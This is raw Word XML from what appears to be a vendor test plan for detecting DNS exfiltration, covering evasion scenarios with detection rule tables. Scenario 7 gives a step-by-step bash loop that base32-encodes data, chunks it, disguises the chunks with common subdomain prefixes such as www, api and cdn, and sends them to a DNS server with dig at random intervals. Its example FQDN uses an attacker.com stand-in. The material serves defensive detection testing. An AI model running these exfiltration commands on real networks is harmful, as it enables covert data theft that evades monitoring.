            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="24FC2599" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E06b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="783B350C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Concatenated label entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="126EFEBB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Compute entropy on ALL labels concatenated (excluding base domain). Catches split encoding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70067C74" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E16128" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8D7DA"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>⛔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve"> IMPORTANT: </w:t>
      </w:r>
      <w:r>
        <w:t>Vendor must evaluate the full FQDN, not each label independently. If they only check per-label entropy, this scenario defeats them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38590E7A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D3B15" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.2 Scenario 7: Legitimate-Looking Labels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04206987"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B2212" w14:paraId="14587690" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="6A7D0BCD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="5A3A944F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="35BDC7C5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="20C94051" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63B51A45" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0608CDE5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4CA5B053" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0B6A3F3D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0E1DBCE6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1ACF8FA7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="27C6BBC2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Prefixes encoded data with common subdomain names to blend with normal traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25E4789B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F39CDD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D599DC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Real DNS traffic contains subdomains like www, mail, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cdn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. By prepending these to the encoded payload, the query looks superficially normal: www-mfrggzdfmy.attacker.com could be mistaken for a CDN or API endpoint at a glance. Combined with a less-known</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> destination domain, this can evade cursory inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C6304" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEF5EFB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B8473" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PREFIXES</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"www" "mail" "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>" "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cdn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>" "dev" "app"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4EB45"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"staging" "test" "ns1" "mx")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB29872" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SEQ=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F3A35"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base32 | tr -d '=\n' | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B8F990"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tr '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[:upper</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">:]' '[:lower:]' | fold -w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>20 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B023F"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38A20B52"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PREFIX=${</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PREFIXES[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$RANDOM % ${#PREFIXES[@]}]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9919DD"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+short "${PREFIX}-${chunk}-${SEQ</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B81FB4A"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SEQ=$((SEQ+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44923514"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5-20 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B0906"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1A65ECF8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5340AC00" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection Rules Required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B2212" w14:paraId="1FAD418A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="731367E5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="4A85AB9C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="05155D69" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0EAB9E6C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="54B80E0B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E07a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33FF9DB4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Structured label pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7051D6D5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Labels matching [word]-[encoded]-[counter] with encoded portion entropy &gt;3.0 → ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="4BCFFAC4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="68E93E38" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E07b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5704D1E5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Domain baseline anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6EF51914" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Queries to domains with zero historical traffic in the environment → flag for enhanced entropy analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04D41DA1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58815698" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This is where domain baselining becomes critical. The vendor's tool must maintain a baseline of 'normal' external domains for the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E3EC64" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0BD19" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.3 Scenario 8: Slow Drip (APT-Level Patience)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C936331"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B2212" w14:paraId="2E6CFF50" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="7D5112FB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="2A5232A0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="06A9CD14" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="268B7C14" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5023C0D7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Very High — APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="2F990826" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B2D2AFE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4ED72AFD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="77725ED6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
